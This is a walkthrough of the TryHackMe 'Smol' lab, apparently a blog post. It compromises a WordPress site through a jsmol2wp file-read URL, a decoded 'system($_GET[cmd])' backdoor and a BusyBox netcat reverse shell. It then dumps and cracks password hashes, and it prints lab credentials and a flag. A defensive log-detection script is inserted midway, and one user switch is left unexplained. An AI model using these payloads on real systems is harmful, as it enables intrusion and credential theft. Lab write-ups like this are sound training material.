Smol TryHackMe Walkthrough — WordPress Plugin Exploit & Privilege Escalation Guide
This article describes a penetration test against a WordPress site: discovering services by scanning, exploiting a plugin vulnerability to obtain database credentials, logging into the admin panel and using a command-execution vulnerability to obtain a reverse shell, reading user password hashes from the database and cracking them, then retrieving the user flag and recovering the password of a zip archive. 2025-9-12 05:26:2 Author: infosecwriteups.com

Initial Reconnaissance

The first step was scanning the target machine to identify running services. I used nmap to perform a service version scan:

nmap -sC -sV 10.201.2.67

Scan Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
80/tcp open  http    Apache httpd 2.4.41 (Ubuntu)

The scan showed two services: SSH and HTTP (a WordPress website).

I added the target domain to my /etc/hosts for convenience:

echo "10.201.2.67 www.smol.thm" | sudo tee -a /etc/hosts

Next, I navigated to the website in my browser. Using the Wappalyzer extension, I confirmed that the website was built with WordPress.


Exploitation Phase

I ran WPScan to enumerate installed plugins, themes, and other useful information:

wpscan --url http://www.smol.thm/

Among the findings, the jsmol2wp plugin looked particularly interesting, so I searched online for known vulnerabilities.


I found a public PoC (Proof of Concept) that allows us to read the wp-config.php file, which contains sensitive information like database credentials.

Exploiting the Vulnerable Plugin

Using the known PoC, I modified the URL to execute the exploit:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Upon visiting the URL, I successfully retrieved the content of the wp-config.php file, which revealed the database username and password.
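Since the same jsmol2wp endpoint is abused twice in this walkthrough (first for wp-config.php, later for hello.php), here is a small detection script for defenders; it is an added example, not part of the original post. It parses constructed Apache access-log lines (not real traffic from the room) and flags jsmol.php requests whose query parameter carries a php:// wrapper or path traversal instead of a molecule file name.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample Apache access-log lines (not from the original post):
# a benign plugin request, the wp-config.php read via php://filter seen in
# the walkthrough, a URL-encoded read of hello.php, and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2025:05:20:01 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=caffeine.mol HTTP/1.1" 200 512
10.0.0.9 - - [12/Sep/2025:05:21:10 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 200 3201
10.0.0.9 - - [12/Sep/2025:05:22:44 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-content%2Fplugins%2Fhello.php HTTP/1.1" 200 777
10.0.0.7 - - [12/Sep/2025:05:23:00 +0000] "GET /index.php HTTP/1.1" 200 9001
"""

# Common Log Format: client ip, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Markers showing the "query" parameter is being used as a local-file read
# rather than pointing at a molecule file.
SUSPICIOUS = ("php://", "../", "wp-config.php")

def find_lfi_attempts(log_text):
    """Return (client ip, decoded query value) for jsmol.php requests that look like file reads."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/jsmol2wp/php/jsmol.php"):
            continue
        # parse_qs percent-decodes once; decode again to catch double encoding.
        for value in parse_qs(parts.query).get("query", []):
            decoded = unquote(value)
            if any(marker in decoded for marker in SUSPICIOUS):
                hits.append((m.group("ip"), decoded))
    return hits

if __name__ == "__main__":
    for ip, query in find_lfi_attempts(SAMPLE_LOG):
        print(f"{ip} -> {query}")
```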

Accessing the WordPress Admin Panel

Armed with the database credentials I retrieved earlier, I headed to the WordPress admin login page:

http://www.smol.thm/wp-admin

I successfully logged in using the following credentials:

  • Username: wpuser
  • Password: kbLSF2Vop#lw3rjDZ629*Z%G

Once inside the dashboard, I noticed one page and three posts. I decided to investigate the page titled “Webmaster Tasks!!”, which seemed interesting.


The page instructed me to check the code of the “Hello Dolly” plugin. A quick search on GitHub revealed that the plugin's source code consists of a file called hello.php.

Based on prior knowledge of vulnerable plugin structures, I assumed the same jsmol2wp file-read endpoint could be pointed at that file:

/wp-content/plugins/jsmol2wp/php/jsmol.php

After several failed attempts, I worked out the correct URL to read the plugin file:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-content/plugins/hello.php

Upon visiting the URL, I discovered a base64-encoded string embedded in the page source.


Decoding the Encoded Value

I copied the encoded string and decoded it using:

echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 -d

The decoded content was:

if (isset($_GET["cmd"])) { system($_GET["cmd"]); }

This confirmed an arbitrary command execution vulnerability via the cmd parameter.

Exploiting the Command Execution to Get a Reverse Shell

Next, I visited revshells.com, looked for a simple BusyBox reverse shell, and copied the following command:

busybox nc <attacker-ip> 4444 -e sh

I started a netcat listener on my AttackBox:

nc -lvnp 4444

Then I triggered the reverse shell by visiting:

http://www.smol.thm/wp-admin/edit.php?cmd=busybox nc 10.17.30.120 4444 -e sh

I immediately received a shell connection:

www-data@ip-10-201-2-67:/var/www/wordpress/wp-admin$

To stabilize the shell, I ran:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
(ctrl + z)
stty raw -echo; fg

Now I had a fully interactive shell.

Exploring the System

At first glance, nothing interesting popped up. But then I remembered the database credentials from the wp-config.php. I tried logging into MySQL:

mysql -u wpuser -p

Entered the password:

kbLSF2Vop#lw3rjDZ629*Z%G

Successful login!

Next, I listed the databases:

show databases;

Output:

+--------------------+
| Database           |
+--------------------+
| wordpress          |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+

I switched to the wordpress database:

use wordpress;
show tables;

Among the tables, the wp_users table stood out. I ran:

select * from wp_users;

This revealed several password hashes. I copied all of them into a file named wordpress_hashes.txt.

Cracking the Password Hashes

Using John the Ripper, I attempted to crack the hashes:

john --wordlist=/usr/share/wordlists/rockyou.txt wordpress_hashes.txt

After some time, I retrieved a valid password for user diego:

  • Password: sandiegocalifornia

Capturing the User Flag

I switched to the diego user:

su diego

Entered the password:

sandiegocalifornia

Then I checked the home directory and found the user.txt file:

cat /home/diego/user.txt

Output:

45edaec653ff9ee06236b7ce72b86963

Accessing Gege’s Account and Extracting the Zip Password

From think@ip-10-201-2-67, I switched to gege:

su gege

Inside /home/gege, the wordpress.old.zip file was present.
To transfer the file to my machine, I started a Python HTTP server:

python3 -m http.server 9999

On my AttackBox, I downloaded the zip file:

wget http://10.201.2.67:9999/wordpress.old.zip

I used zip2john to prepare the file for cracking:

zip2john wordpress.old.zip > wp.txt

Then ran John the Ripper to crack the zip password:

john wp.txt -w=/usr/share/wordlists/rockyou.txt

Success! The cracked password was:

[email protected]

Source: https://infosecwriteups.com/smol-tryhackme-walkthrough-wordpress-plugin-exploit-privilege-escalation-guide-c62d758eb898?source=rss----7b722bfd1b8d---4